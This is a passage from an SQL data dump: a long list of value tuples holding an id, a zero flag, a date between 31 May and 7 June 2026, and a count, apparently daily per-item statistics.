70,0,'20260531',2),(5593,0,'20260531',2),(5769,0,'20260531',2),(5778,0,'20260531',2),(5816,0,'20260531',2),(5821,0,'20260531',2),(5828,0,'20260531',2),(5859,0,'20260531',2),(5868,0,'20260531',2),(5875,0,'20260531',2),(5917,0,'20260531',2),(469,0,'20260531',3),(478,0,'20260531',3),(1592,0,'20260531',3),(1604,0,'20260531',3),(1608,0,'20260531',3),(2159,0,'20260531',3),(2248,0,'20260531',3),(2558,0,'20260531',3),(2617,0,'20260531',3),(3117,0,'20260531',3),(3243,0,'20260531',3),(3278,0,'20260531',3),(3290,0,'20260531',3),(3531,0,'20260531',3),(3731,0,'20260531',3),(3781,0,'20260531',3),(4377,0,'20260531',3),(4514,0,'20260531',3),(4546,0,'20260531',3),(4750,0,'20260531',3),(4771,0,'20260531',3),(4792,0,'20260531',3),(5042,0,'20260531',3),(5050,0,'20260531',3),(5076,0,'20260531',3),(5122,0,'20260531',3),(5298,0,'20260531',3),(5307,0,'20260531',3),(5334,0,'20260531',3),(5436,0,'20260531',3),(5502,0,'20260531',3),(5567,0,'20260531',3),(5674,0,'20260531',3),(5700,0,'20260531',3),(5735,0,'20260531',3),(5824,0,'20260531',3),(5865,0,'20260531',3),(5881,0,'20260531',3),(5925,0,'20260531',3),(74,0,'20260531',4),(84,0,'20260531',4),(106,0,'20260531',4),(477,0,'20260531',4),(1602,0,'20260531',4),(1724,0,'20260531',4),(1741,0,'20260531',4),(1778,0,'20260531',4),(3749,0,'20260531',4),(4335,0,'20260531',4),(4420,0,'20260531',4),(4520,0,'20260531',4),(4551,0,'20260531',4),(4660,0,'20260531',4),(4697,0,'20260531',4),(4776,0,'20260531',4),(4930,0,'20260531',4),(5037,0,'20260531',4),(5314,0,'20260531',4),(5433,0,'20260531',4),(5489,0,'20260531',4),(5833,0,'20260531',4),(5878,0,'20260531',4),(5884,0,'20260531',4),(102,0,'20260531',5),(468,0,'20260531',5),(1582,0,'20260531',5),(1584,0,'20260531',5),(3060,0,'20260531',5),(4529,0,'20260531',5),(5101,0,'20260531',5),(5844,0,'20260531',5),(5921,0,'20260531',5),(76,0,'20260531',6),(108,0,'20260531',6),(487,0,'20260531',6),(5910,0,'20260531',6),(335,0,'20260531',7),(473,0,'20260531',7),(1774,0,'20260531',7),(3273,0,'20260531',7),(68,0,'20260531',8),(474,0,'20260531',8),(5930,0,'20260531',8),(87,0,'20260531',9),(89,0,'20260531',9),(470,0,'20260531',9),(2503,0,'20260531',10),(5902,0,'20260531',11),(5906,0,'20260531',11),(4332,0,'20260531',12),(72,0,'20260531',14),(91,0,'20260531',19),(80,0,'20260531',52),(9,0,'20260531',754),(102,0,'20260601',1),(106,0,'20260601',1),(467,0,'20260601',1),(470,0,'20260601',1),(471,0,'20260601',1),(482,0,'20260601',1),(484,0,'20260601',1),(485,0,'20260601',1),(487,0,'20260601',1),(488,0,'20260601',1),(1584,0,'20260601',1),(1586,0,'20260601',1),(1592,0,'20260601',1),(1598,0,'20260601',1),(1602,0,'20260601',1),(1610,0,'20260601',1),(1614,0,'20260601',1),(1695,0,'20260601',1),(1697,0,'20260601',1),(1705,0,'20260601',1),(1711,0,'20260601',1),(1718,0,'20260601',1),(1724,0,'20260601',1),(1726,0,'20260601',1),(1728,0,'20260601',1),(1772,0,'20260601',1),(1778,0,'20260601',1),(1780,0,'20260601',1),(1782,0,'20260601',1),(2159,0,'20260601',1),(2161,0,'20260601',1),(2165,0,'20260601',1),(2252,0,'20260601',1),(2457,0,'20260601',1),(2769,0,'20260601',1),(2813,0,'20260601',1),(2911,0,'20260601',1),(2956,0,'20260601',1),(2964,0,'20260601',1),(2965,0,'20260601',1),(2993,0,'20260601',1),(3005,0,'20260601',1),(3006,0,'20260601',1),(3023,0,'20260601',1),(3034,0,'20260601',1),(3038,0,'20260601',1),(3063,0,'20260601',1),(3072,0,'20260601',1),(3102,0,'20260601',1),(3117,0,'20260601',1),(3127,0,'20260601',1),(3243,0,'20260601',1),(3245,0,'20260601',1),(3247,0,'20260601',1),(3257,0,'20260601',1),(3261,0,'20260601',1),(3265,0,'20260601',1),(3271,0,'20260601',1),(3273,0,'20260601',1),(3278,0,'20260601',1),(3285,0,'20260601',1),(3290,0,'20260601',1),(3297,0,'20260601',1),(3430,0,'20260601',1),(3479,0,'20260601',1),(3482,0,'20260601',1),(3531,0,'20260601',1),(3534,0,'20260601',1),(3541,0,'20260601',1),(3721,0,'20260601',1),(3724,0,'20260601',1),(3727,0,'20260601',1),(3731,0,'20260601',1),(3749,0,'20260601',1),(3774,0,'20260601',1),(3781,0,'20260601',1),(4238,0,'20260601',1),(4275,0,'20260601',1),(4326,0,'20260601',1),(4332,0,'20260601',1),(4338,0,'20260601',1),(4382,0,'20260601',1),(4400,0,'20260601',1),(4404,0,'20260601',1),(4412,0,'20260601',1),(4420,0,'20260601',1),(4424,0,'20260601',1),(4448,0,'20260601',1),(4556,0,'20260601',1),(4582,0,'20260601',1),(4645,0,'20260601',1),(4657,0,'20260601',1),(4660,0,'20260601',1),(4688,0,'20260601',1),(4700,0,'20260601',1),(4703,0,'20260601',1),(4709,0,'20260601',1),(4712,0,'20260601',1),(4741,0,'20260601',1),(4750,0,'20260601',1),(4768,0,'20260601',1),(4776,0,'20260601',1),(4858,0,'20260601',1),(4866,0,'20260601',1),(4930,0,'20260601',1),(4980,0,'20260601',1),(5033,0,'20260601',1),(5046,0,'20260601',1),(5122,0,'20260601',1),(5134,0,'20260601',1),(5137,0,'20260601',1),(5163,0,'20260601',1),(5256,0,'20260601',1),(5264,0,'20260601',1),(5292,0,'20260601',1),(5301,0,'20260601',1),(5307,0,'20260601',1),(5317,0,'20260601',1),(5326,0,'20260601',1),(5330,0,'20260601',1),(5334,0,'20260601',1),(5353,0,'20260601',1),(5378,0,'20260601',1),(5415,0,'20260601',1),(5425,0,'20260601',1),(5441,0,'20260601',1),(5464,0,'20260601',1),(5502,0,'20260601',1),(5561,0,'20260601',1),(5570,0,'20260601',1),(5582,0,'20260601',1),(5585,0,'20260601',1),(5626,0,'20260601',1),(5662,0,'20260601',1),(5696,0,'20260601',1),(5738,0,'20260601',1),(5769,0,'20260601',1),(5821,0,'20260601',1),(5824,0,'20260601',1),(5828,0,'20260601',1),(5875,0,'20260601',1),(5889,0,'20260601',1),(335,0,'20260601',2),(468,0,'20260601',2),(473,0,'20260601',2),(478,0,'20260601',2),(1582,0,'20260601',2),(1594,0,'20260601',2),(1600,0,'20260601',2),(1715,0,'20260601',2),(1722,0,'20260601',2),(1737,0,'20260601',2),(1751,0,'20260601',2),(2063,0,'20260601',2),(2297,0,'20260601',2),(2704,0,'20260601',2),(3030,0,'20260601',2),(3045,0,'20260601',2),(3060,0,'20260601',2),(3069,0,'20260601',2),(3079,0,'20260601',2),(3083,0,'20260601',2),(3124,0,'20260601',2),(3251,0,'20260601',2),(3313,0,'20260601',2),(3714,0,'20260601',2),(3735,0,'20260601',2),(3771,0,'20260601',2),(4323,0,'20260601',2),(4341,0,'20260601',2),(4396,0,'20260601',2),(4436,0,'20260601',2),(4514,0,'20260601',2),(4517,0,'20260601',2),(4520,0,'20260601',2),(4524,0,'20260601',2),(4674,0,'20260601',2),(4677,0,'20260601',2),(4691,0,'20260601',2),(4694,0,'20260601',2),(4722,0,'20260601',2),(4744,0,'20260601',2),(4765,0,'20260601',2),(4771,0,'20260601',2),(4976,0,'20260601',2),(4977,0,'20260601',2),(4996,0,'20260601',2),(5037,0,'20260601',2),(5054,0,'20260601',2),(5058,0,'20260601',2),(5067,0,'20260601',2),(5076,0,'20260601',2),(5080,0,'20260601',2),(5101,0,'20260601',2),(5128,0,'20260601',2),(5153,0,'20260601',2),(5259,0,'20260601',2),(5268,0,'20260601',2),(5271,0,'20260601',2),(5289,0,'20260601',2),(5295,0,'20260601',2),(5304,0,'20260601',2),(5310,0,'20260601',2),(5397,0,'20260601',2),(5433,0,'20260601',2),(5512,0,'20260601',2),(5515,0,'20260601',2),(5567,0,'20260601',2),(5601,0,'20260601',2),(5666,0,'20260601',2),(5683,0,'20260601',2),(5735,0,'20260601',2),(5771,0,'20260601',2),(5785,0,'20260601',2),(5816,0,'20260601',2),(5833,0,'20260601',2),(5847,0,'20260601',2),(5865,0,'20260601',2),(5872,0,'20260601',2),(74,0,'20260601',3),(87,0,'20260601',3),(108,0,'20260601',3),(1604,0,'20260601',3),(1608,0,'20260601',3),(1612,0,'20260601',3),(3090,0,'20260601',3),(4301,0,'20260601',3),(4454,0,'20260601',3),(4654,0,'20260601',3),(4706,0,'20260601',3),(4874,0,'20260601',3),(4983,0,'20260601',3),(5071,0,'20260601',3),(5125,0,'20260601',3),(5140,0,'20260601',3),(5253,0,'20260601',3),(5276,0,'20260601',3),(5356,0,'20260601',3),(5374,0,'20260601',3),(5578,0,'20260601',3),(5605,0,'20260601',3),(5700,0,'20260601',3),(5762,0,'20260601',3),(5844,0,'20260601',3),(5884,0,'20260601',3),(5917,0,'20260601',3),(570,0,'20260601',4),(1701,0,'20260601',4),(2148,0,'20260601',4),(2804,0,'20260601',4),(3498,0,'20260601',4),(3742,0,'20260601',4),(4529,0,'20260601',4),(4608,0,'20260601',4),(4648,0,'20260601',4),(4651,0,'20260601',4),(5062,0,'20260601',4),(5298,0,'20260601',4),(5314,0,'20260601',4),(5359,0,'20260601',4),(5406,0,'20260601',4),(5420,0,'20260601',4),(5457,0,'20260601',4),(5492,0,'20260601',4),(5778,0,'20260601',4),(89,0,'20260601',5),(474,0,'20260601',5),(2503,0,'20260601',5),(4747,0,'20260601',5),(5436,0,'20260601',5),(5598,0,'20260601',5),(5878,0,'20260601',5),(5921,0,'20260601',5),(5925,0,'20260601',5),(84,0,'20260601',6),(3316,0,'20260601',6),(5859,0,'20260601',6),(5868,0,'20260601',6),(5881,0,'20260601',6),(5902,0,'20260601',6),(76,0,'20260601',7),(5906,0,'20260601',7),(5454,0,'20260601',8),(5593,0,'20260601',8),(5489,0,'20260601',9),(5930,0,'20260601',9),(68,0,'20260601',12),(72,0,'20260601',12),(5910,0,'20260601',12),(91,0,'20260601',16),(80,0,'20260601',32),(9,0,'20260601',714),(74,0,'20260602',1),(102,0,'20260602',1),(467,0,'20260602',1),(469,0,'20260602',1),(474,0,'20260602',1),(476,0,'20260602',1),(477,0,'20260602',1),(479,0,'20260602',1),(483,0,'20260602',1),(485,0,'20260602',1),(486,0,'20260602',1),(488,0,'20260602',1),(570,0,'20260602',1),(1584,0,'20260602',1),(1592,0,'20260602',1),(1600,0,'20260602',1),(1604,0,'20260602',1),(1707,0,'20260602',1),(1722,0,'20260602',1),(1741,0,'20260602',1),(1780,0,'20260602',1),(1782,0,'20260602',1),(2148,0,'20260602',1),(2154,0,'20260602',1),(2159,0,'20260602',1),(2503,0,'20260602',1),(2658,0,'20260602',1),(2751,0,'20260602',1),(2769,0,'20260602',1),(2801,0,'20260602',1),(3004,0,'20260602',1),(3030,0,'20260602',1),(3034,0,'20260602',1),(3038,0,'20260602',1),(3041,0,'20260602',1),(3063,0,'20260602',1),(3087,0,'20260602',1),(3117,0,'20260602',1),(3243,0,'20260602',1),(3271,0,'20260602',1),(3278,0,'20260602',1),(3280,0,'20260602',1),(3290,0,'20260602',1),(3297,0,'20260602',1),(3307,0,'20260602',1),(3316,0,'20260602',1),(3486,0,'20260602',1),(3489,0,'20260602',1),(3721,0,'20260602',1),(3727,0,'20260602',1),(3742,0,'20260602',1),(3746,0,'20260602',1),(3764,0,'20260602',1),(3777,0,'20260602',1),(4238,0,'20260602',1),(4329,0,'20260602',1),(4335,0,'20260602',1),(4338,0,'20260602',1),(4408,0,'20260602',1),(4436,0,'20260602',1),(4440,0,'20260602',1),(4454,0,'20260602',1),(4457,0,'20260602',1),(4520,0,'20260602',1),(4546,0,'20260602',1),(4648,0,'20260602',1),(4660,0,'20260602',1),(4668,0,'20260602',1),(4677,0,'20260602',1),(4681,0,'20260602',1),(4685,0,'20260602',1),(4688,0,'20260602',1),(4697,0,'20260602',1),(4709,0,'20260602',1),(4744,0,'20260602',1),(4747,0,'20260602',1),(4756,0,'20260602',1),(4759,0,'20260602',1),(4762,0,'20260602',1),(4776,0,'20260602',1),(4802,0,'20260602',1),(4858,0,'20260602',1),(4977,0,'20260602',1),(4980,0,'20260602',1),(4996,0,'20260602',1),(5033,0,'20260602',1),(5071,0,'20260602',1),(5101,0,'20260602',1),(5122,0,'20260602',1),(5140,0,'20260602',1),(5146,0,'20260602',1),(5157,0,'20260602',1),(5163,0,'20260602',1),(5268,0,'20260602',1),(5271,0,'20260602',1),(5280,0,'20260602',1),(5298,0,'20260602',1),(5307,0,'20260602',1),(5314,0,'20260602',1),(5326,0,'20260602',1),(5359,0,'20260602',1),(5363,0,'20260602',1),(5378,0,'20260602',1),(5409,0,'20260602',1),(5412,0,'20260602',1),(5428,0,'20260602',1),(5441,0,'20260602',1),(5454,0,'20260602',1),(5461,0,'20260602',1),(5472,0,'20260602',1),(5489,0,'20260602',1),(5561,0,'20260602',1),(5570,0,'20260602',1),(5700,0,'20260602',1),(5735,0,'20260602',1),(5738,0,'20260602',1),(5771,0,'20260602',1),(5785,0,'20260602',1),(5816,0,'20260602',1),(5828,0,'20260602',1),(5844,0,'20260602',1),(5847,0,'20260602',1),(5865,0,'20260602',1),(5875,0,'20260602',1),(5902,0,'20260602',1),(5921,0,'20260602',1),(72,0,'20260602',2),(84,0,'20260602',2),(89,0,'20260602',2),(473,0,'20260602',2),(481,0,'20260602',2),(484,0,'20260602',2),(1544,0,'20260602',2),(1724,0,'20260602',2),(3023,0,'20260602',2),(3124,0,'20260602',2),(3259,0,'20260602',2),(3710,0,'20260602',2),(3731,0,'20260602',2),(3735,0,'20260602',2),(4301,0,'20260602',2),(4341,0,'20260602',2),(4412,0,'20260602',2),(4542,0,'20260602',2),(4862,0,'20260602',2),(4930,0,'20260602',2),(5028,0,'20260602',2),(5076,0,'20260602',2),(5400,0,'20260602',2),(5420,0,'20260602',2),(5433,0,'20260602',2),(5457,0,'20260602',2),(5464,0,'20260602',2),(5567,0,'20260602',2),(5598,0,'20260602',2),(5683,0,'20260602',2),(5872,0,'20260602',2),(5878,0,'20260602',2),(5881,0,'20260602',2),(5930,0,'20260602',2),(108,0,'20260602',3),(335,0,'20260602',3),(2558,0,'20260602',3),(2704,0,'20260602',3),(3090,0,'20260602',3),(3287,0,'20260602',3),(3781,0,'20260602',3),(4326,0,'20260602',3),(5502,0,'20260602',3),(5762,0,'20260602',3),(5884,0,'20260602',3),(5910,0,'20260602',3),(472,0,'20260602',4),(1602,0,'20260602',4),(2297,0,'20260602',4),(3534,0,'20260602',4),(5406,0,'20260602',4),(5906,0,'20260602',4),(5397,0,'20260602',5),(3060,0,'20260602',6),(76,0,'20260602',7),(91,0,'20260602',7),(1582,0,'20260602',7),(68,0,'20260602',13),(2904,0,'20260602',13),(80,0,'20260602',20),(9,0,'20260602',407),(68,0,'20260603',1),(76,0,'20260603',1),(87,0,'20260603',1),(108,0,'20260603',1),(335,0,'20260603',1),(474,0,'20260603',1),(476,0,'20260603',1),(477,0,'20260603',1),(480,0,'20260603',1),(570,0,'20260603',1),(1592,0,'20260603',1),(1596,0,'20260603',1),(1600,0,'20260603',1),(1602,0,'20260603',1),(1610,0,'20260603',1),(1612,0,'20260603',1),(1695,0,'20260603',1),(1699,0,'20260603',1),(1707,0,'20260603',1),(1715,0,'20260603',1),(1718,0,'20260603',1),(1722,0,'20260603',1),(1728,0,'20260603',1),(1732,0,'20260603',1),(1739,0,'20260603',1),(1778,0,'20260603',1),(1782,0,'20260603',1),(2159,0,'20260603',1),(2165,0,'20260603',1),(2309,0,'20260603',1),(2503,0,'20260603',1),(2704,0,'20260603',1),(2775,0,'20260603',1),(3038,0,'20260603',1),(3124,0,'20260603',1),(3249,0,'20260603',1),(3257,0,'20260603',1),(3261,0,'20260603',1),(3271,0,'20260603',1),(3282,0,'20260603',1),(3430,0,'20260603',1),(3541,0,'20260603',1),(3710,0,'20260603',1),(4238,0,'20260603',1),(4363,0,'20260603',1),(4436,0,'20260603',1),(4440,0,'20260603',1),(4551,0,'20260603',1),(4582,0,'20260603',1),(4608,0,'20260603',1),(4612,0,'20260603',1),(4660,0,'20260603',1),(4674,0,'20260603',1),(4688,0,'20260603',1),(4759,0,'20260603',1),(4792,0,'20260603',1),(4797,0,'20260603',1),(4858,0,'20260603',1),(4862,0,'20260603',1),(4897,0,'20260603',1),(4988,0,'20260603',1),(5062,0,'20260603',1),(5071,0,'20260603',1),(5076,0,'20260603',1),(5140,0,'20260603',1),(5264,0,'20260603',1),(5268,0,'20260603',1),(5359,0,'20260603',1),(5363,0,'20260603',1),(5428,0,'20260603',1),(5441,0,'20260603',1),(5449,0,'20260603',1),(5454,0,'20260603',1),(5457,0,'20260603',1),(5502,0,'20260603',1),(5582,0,'20260603',1),(5601,0,'20260603',1),(5662,0,'20260603',1),(5674,0,'20260603',1),(5735,0,'20260603',1),(5738,0,'20260603',1),(5785,0,'20260603',1),(5816,0,'20260603',1),(5824,0,'20260603',1),(5828,0,'20260603',1),(5833,0,'20260603',1),(5847,0,'20260603',1),(5859,0,'20260603',1),(5881,0,'20260603',1),(5889,0,'20260603',1),(5906,0,'20260603',1),(5921,0,'20260603',1),(89,0,'20260603',2),(468,0,'20260603',2),(481,0,'20260603',2),(1544,0,'20260603',2),(1588,0,'20260603',2),(1598,0,'20260603',2),(1614,0,'20260603',2),(1703,0,'20260603',2),(1747,0,'20260603',2),(1766,0,'20260603',2),(3072,0,'20260603',2),(3092,0,'20260603',2),(4556,0,'20260603',2),(4663,0,'20260603',2),(4977,0,'20260603',2),(5058,0,'20260603',2),(5298,0,'20260603',2),(5409,0,'20260603',2),(5436,0,'20260603',2),(5696,0,'20260603',2),(5700,0,'20260603',2),(5762,0,'20260603',2),(5844,0,'20260603',2),(5930,0,'20260603',2),(472,0,'20260603',3),(478,0,'20260603',3),(1582,0,'20260603',3),(1586,0,'20260603',3),(2150,0,'20260603',3),(2769,0,'20260603',3),(5020,0,'20260603',3),(5397,0,'20260603',3),(5415,0,'20260603',3),(5769,0,'20260603',3),(5778,0,'20260603',3),(3781,0,'20260603',4),(72,0,'20260603',5),(3102,0,'20260603',6),(91,0,'20260603',10),(80,0,'20260603',33),(9,0,'20260603',381),(72,0,'20260604',1),(74,0,'20260604',1),(84,0,'20260604',1),(108,0,'20260604',1),(472,0,'20260604',1),(1544,0,'20260604',1),(1592,0,'20260604',1),(1594,0,'20260604',1),(1596,0,'20260604',1),(1598,0,'20260604',1),(1604,0,'20260604',1),(1699,0,'20260604',1),(1705,0,'20260604',1),(1715,0,'20260604',1),(1718,0,'20260604',1),(1722,0,'20260604',1),(1728,0,'20260604',1),(1734,0,'20260604',1),(1766,0,'20260604',1),(1770,0,'20260604',1),(1774,0,'20260604',1),(2156,0,'20260604',1),(2297,0,'20260604',1),(2801,0,'20260604',1),(2813,0,'20260604',1),(2964,0,'20260604',1),(2989,0,'20260604',1),(3069,0,'20260604',1),(3072,0,'20260604',1),(3253,0,'20260604',1),(3267,0,'20260604',1),(3482,0,'20260604',1),(3771,0,'20260604',1),(4335,0,'20260604',1),(4377,0,'20260604',1),(4391,0,'20260604',1),(4432,0,'20260604',1),(4542,0,'20260604',1),(4566,0,'20260604',1),(4587,0,'20260604',1),(4645,0,'20260604',1),(4668,0,'20260604',1),(4747,0,'20260604',1),(4771,0,'20260604',1),(4776,0,'20260604',1),(4980,0,'20260604',1),(5071,0,'20260604',1),(5131,0,'20260604',1),(5268,0,'20260604',1),(5326,0,'20260604',1),(5334,0,'20260604',1),(5356,0,'20260604',1),(5363,0,'20260604',1),(5378,0,'20260604',1),(5400,0,'20260604',1),(5406,0,'20260604',1),(5415,0,'20260604',1),(5428,0,'20260604',1),(5489,0,'20260604',1),(5570,0,'20260604',1),(5582,0,'20260604',1),(5598,0,'20260604',1),(5626,0,'20260604',1),(5771,0,'20260604',1),(5821,0,'20260604',1),(5828,0,'20260604',1),(5833,0,'20260604',1),(5844,0,'20260604',1),(5847,0,'20260604',1),(5859,0,'20260604',1),(5865,0,'20260604',1),(5868,0,'20260604',1),(5872,0,'20260604',1),(5884,0,'20260604',1),(5906,0,'20260604',1),(5930,0,'20260604',1),(68,0,'20260604',2),(87,0,'20260604',2),(89,0,'20260604',2),(468,0,'20260604',2),(474,0,'20260604',2),(1582,0,'20260604',2),(1586,0,'20260604',2),(1600,0,'20260604',2),(1703,0,'20260604',2),(2457,0,'20260604',2),(2503,0,'20260604',2),(2558,0,'20260604',2),(2704,0,'20260604',2),(3006,0,'20260604',2),(3060,0,'20260604',2),(3083,0,'20260604',2),(3102,0,'20260604',2),(4930,0,'20260604',2),(5067,0,'20260604',2),(5259,0,'20260604',2),(5276,0,'20260604',2),(5280,0,'20260604',2),(5397,0,'20260604',2),(5436,0,'20260604',2),(5457,0,'20260604',2),(5567,0,'20260604',2),(5593,0,'20260604',2),(5881,0,'20260604',2),(5902,0,'20260604',2),(5917,0,'20260604',2),(76,0,'20260604',3),(3710,0,'20260604',3),(4420,0,'20260604',3),(5769,0,'20260604',3),(5778,0,'20260604',3),(5910,0,'20260604',3),(1588,0,'20260604',4),(1747,0,'20260604',5),(91,0,'20260604',11),(80,0,'20260604',22),(9,0,'20260604',357),(76,0,'20260605',1),(106,0,'20260605',1),(108,0,'20260605',1),(469,0,'20260605',1),(471,0,'20260605',1),(472,0,'20260605',1),(477,0,'20260605',1),(570,0,'20260605',1),(1586,0,'20260605',1),(1588,0,'20260605',1),(1590,0,'20260605',1),(1592,0,'20260605',1),(1594,0,'20260605',1),(1604,0,'20260605',1),(1705,0,'20260605',1),(1715,0,'20260605',1),(1730,0,'20260605',1),(1749,0,'20260605',1),(1778,0,'20260605',1),(2148,0,'20260605',1),(2152,0,'20260605',1),(2297,0,'20260605',1),(2457,0,'20260605',1),(2558,0,'20260605',1),(2658,0,'20260605',1),(2769,0,'20260605',1),(2801,0,'20260605',1),(2809,0,'20260605',1),(2965,0,'20260605',1),(2989,0,'20260605',1),(3006,0,'20260605',1),(3027,0,'20260605',1),(3034,0,'20260605',1),(3041,0,'20260605',1),(3066,0,'20260605',1),(3079,0,'20260605',1),(3083,0,'20260605',1),(3087,0,'20260605',1),(3109,0,'20260605',1),(3247,0,'20260605',1),(3253,0,'20260605',1),(3267,0,'20260605',1),(3285,0,'20260605',1),(3297,0,'20260605',1),(3735,0,'20260605',1),(3764,0,'20260605',1),(4335,0,'20260605',1),(4341,0,'20260605',1),(4368,0,'20260605',1),(4440,0,'20260605',1),(4454,0,'20260605',1),(4524,0,'20260605',1),(4551,0,'20260605',1),(4556,0,'20260605',1),(4591,0,'20260605',1),(4657,0,'20260605',1),(4677,0,'20260605',1),(4706,0,'20260605',1),(4712,0,'20260605',1),(4870,0,'20260605',1),(4930,0,'20260605',1),(5028,0,'20260605',1),(5071,0,'20260605',1),(5137,0,'20260605',1),(5256,0,'20260605',1),(5259,0,'20260605',1),(5268,0,'20260605',1),(5271,0,'20260605',1),(5307,0,'20260605',1),(5310,0,'20260605',1),(5326,0,'20260605',1),(5353,0,'20260605',1),(5409,0,'20260605',1),(5457,0,'20260605',1),(5502,0,'20260605',1),(5585,0,'20260605',1),(5598,0,'20260605',1),(5626,0,'20260605',1),(5683,0,'20260605',1),(5696,0,'20260605',1),(5735,0,'20260605',1),(5771,0,'20260605',1),(5785,0,'20260605',1),(5816,0,'20260605',1),(5844,0,'20260605',1),(5881,0,'20260605',1),(5925,0,'20260605',1),(68,0,'20260605',2),(84,0,'20260605',2),(87,0,'20260605',2),(89,0,'20260605',2),(1598,0,'20260605',2),(1608,0,'20260605',2),(1728,0,'20260605',2),(2704,0,'20260605',2),(2813,0,'20260605',2),(3102,0,'20260605',2),(3290,0,'20260605',2),(3777,0,'20260605',2),(4382,0,'20260605',2),(4756,0,'20260605',2),(4776,0,'20260605',2),(5076,0,'20260605',2),(5153,0,'20260605',2),(5415,0,'20260605',2),(5428,0,'20260605',2),(5449,0,'20260605',2),(5578,0,'20260605',2),(5636,0,'20260605',2),(5762,0,'20260605',2),(5821,0,'20260605',2),(5865,0,'20260605',2),(5868,0,'20260605',2),(5878,0,'20260605',2),(5884,0,'20260605',2),(5902,0,'20260605',2),(335,0,'20260605',3),(1544,0,'20260605',3),(5397,0,'20260605',3),(5420,0,'20260605',3),(5582,0,'20260605',3),(5906,0,'20260605',3),(1582,0,'20260605',4),(2503,0,'20260605',4),(5425,0,'20260605',4),(5454,0,'20260605',4),(5570,0,'20260605',4),(5674,0,'20260605',4),(5769,0,'20260605',4),(5910,0,'20260605',4),(5930,0,'20260605',4),(72,0,'20260605',6),(3781,0,'20260605',6),(91,0,'20260605',8),(80,0,'20260605',27),(9,0,'20260605',584),(74,0,'20260606',1),(84,0,'20260606',1),(87,0,'20260606',1),(468,0,'20260606',1),(474,0,'20260606',1),(477,0,'20260606',1),(570,0,'20260606',1),(1584,0,'20260606',1),(1586,0,'20260606',1),(1596,0,'20260606',1),(1598,0,'20260606',1),(1602,0,'20260606',1),(1608,0,'20260606',1),(1610,0,'20260606',1),(1612,0,'20260606',1),(1703,0,'20260606',1),(1705,0,'20260606',1),(1715,0,'20260606',1),(1722,0,'20260606',1),(1728,0,'20260606',1),(1741,0,'20260606',1),(1749,0,'20260606',1),(1751,0,'20260606',1),(1766,0,'20260606',1),(1770,0,'20260606',1),(1772,0,'20260606',1),(2154,0,'20260606',1),(2165,0,'20260606',1),(2309,0,'20260606',1),(2609,0,'20260606',1),(2617,0,'20260606',1),(2751,0,'20260606',1),(2813,0,'20260606',1),(3027,0,'20260606',1),(3034,0,'20260606',1),(3041,0,'20260606',1),(3063,0,'20260606',1),(3066,0,'20260606',1),(3083,0,'20260606',1),(3104,0,'20260606',1),(3226,0,'20260606',1),(3240,0,'20260606',1),(3249,0,'20260606',1),(3253,0,'20260606',1),(3261,0,'20260606',1),(3273,0,'20260606',1),(3275,0,'20260606',1),(3287,0,'20260606',1),(3489,0,'20260606',1),(3531,0,'20260606',1),(3710,0,'20260606',1),(3738,0,'20260606',1),(3764,0,'20260606',1),(3774,0,'20260606',1),(4301,0,'20260606',1),(4341,0,'20260606',1),(4382,0,'20260606',1),(4400,0,'20260606',1),(4412,0,'20260606',1),(4416,0,'20260606',1),(4424,0,'20260606',1),(4436,0,'20260606',1),(4454,0,'20260606',1),(4457,0,'20260606',1),(4542,0,'20260606',1),(4556,0,'20260606',1),(4612,0,'20260606',1),(4645,0,'20260606',1),(4677,0,'20260606',1),(4685,0,'20260606',1),(4703,0,'20260606',1),(4712,0,'20260606',1),(4750,0,'20260606',1),(4797,0,'20260606',1),(4858,0,'20260606',1),(4870,0,'20260606',1),(4883,0,'20260606',1),(4983,0,'20260606',1),(5033,0,'20260606',1),(5037,0,'20260606',1),(5054,0,'20260606',1),(5067,0,'20260606',1),(5071,0,'20260606',1),(5076,0,'20260606',1),(5128,0,'20260606',1),(5134,0,'20260606',1),(5140,0,'20260606',1),(5253,0,'20260606',1),(5268,0,'20260606',1),(5280,0,'20260606',1),(5378,0,'20260606',1),(5436,0,'20260606',1),(5441,0,'20260606',1),(5666,0,'20260606',1),(5696,0,'20260606',1),(5735,0,'20260606',1),(5771,0,'20260606',1),(5816,0,'20260606',1),(5821,0,'20260606',1),(5828,0,'20260606',1),(5847,0,'20260606',1),(5865,0,'20260606',1),(5872,0,'20260606',1),(5875,0,'20260606',1),(5878,0,'20260606',1),(5881,0,'20260606',1),(5884,0,'20260606',1),(5889,0,'20260606',1),(5917,0,'20260606',1),(5921,0,'20260606',1),(335,0,'20260606',2),(476,0,'20260606',2),(480,0,'20260606',2),(487,0,'20260606',2),(1582,0,'20260606',2),(1600,0,'20260606',2),(1606,0,'20260606',2),(1720,0,'20260606',2),(1734,0,'20260606',2),(1747,0,'20260606',2),(1774,0,'20260606',2),(2156,0,'20260606',2),(2293,0,'20260606',2),(2503,0,'20260606',2),(3004,0,'20260606',2),(3079,0,'20260606',2),(3096,0,'20260606',2),(3102,0,'20260606',2),(3117,0,'20260606',2),(3247,0,'20260606',2),(3271,0,'20260606',2),(4275,0,'20260606',2),(4323,0,'20260606',2),(4338,0,'20260606',2),(4373,0,'20260606',2),(4404,0,'20260606',2),(4517,0,'20260606',2),(4524,0,'20260606',2),(4651,0,'20260606',2),(4674,0,'20260606',2),(4930,0,'20260606',2),(5153,0,'20260606',2),(5256,0,'20260606',2),(5264,0,'20260606',2),(5276,0,'20260606',2),(5292,0,'20260606',2),(5353,0,'20260606',2),(5359,0,'20260606',2),(5406,0,'20260606',2),(5409,0,'20260606',2),(5449,0,'20260606',2),(5489,0,'20260606',2),(5512,0,'20260606',2),(5662,0,'20260606',2),(5700,0,'20260606',2),(5769,0,'20260606',2),(5785,0,'20260606',2),(5844,0,'20260606',2),(5902,0,'20260606',2),(5910,0,'20260606',2),(5925,0,'20260606',2),(76,0,'20260606',3),(2152,0,'20260606',3),(2658,0,'20260606',3),(2704,0,'20260606',3),(2769,0,'20260606',3),(3290,0,'20260606',3),(3777,0,'20260606',3),(5259,0,'20260606',3),(5271,0,'20260606',3),(5570,0,'20260606',3),(5636,0,'20260606',3),(5824,0,'20260606',3),(68,0,'20260606',4),(72,0,'20260606',4),(89,0,'20260606',4),(110,0,'20260606',4),(1614,0,'20260606',4),(3005,0,'20260606',4),(4744,0,'20260606',4),(4977,0,'20260606',4),(5738,0,'20260606',4),(5859,0,'20260606',4),(5906,0,'20260606',4),(3781,0,'20260606',5),(5930,0,'20260606',5),(91,0,'20260606',6),(1594,0,'20260606',6),(80,0,'20260606',33),(9,0,'20260606',499),(68,0,'20260607',1),(89,0,'20260607',1),(110,0,'20260607',1),(468,0,'20260607',1),(469,0,'20260607',1),(474,0,'202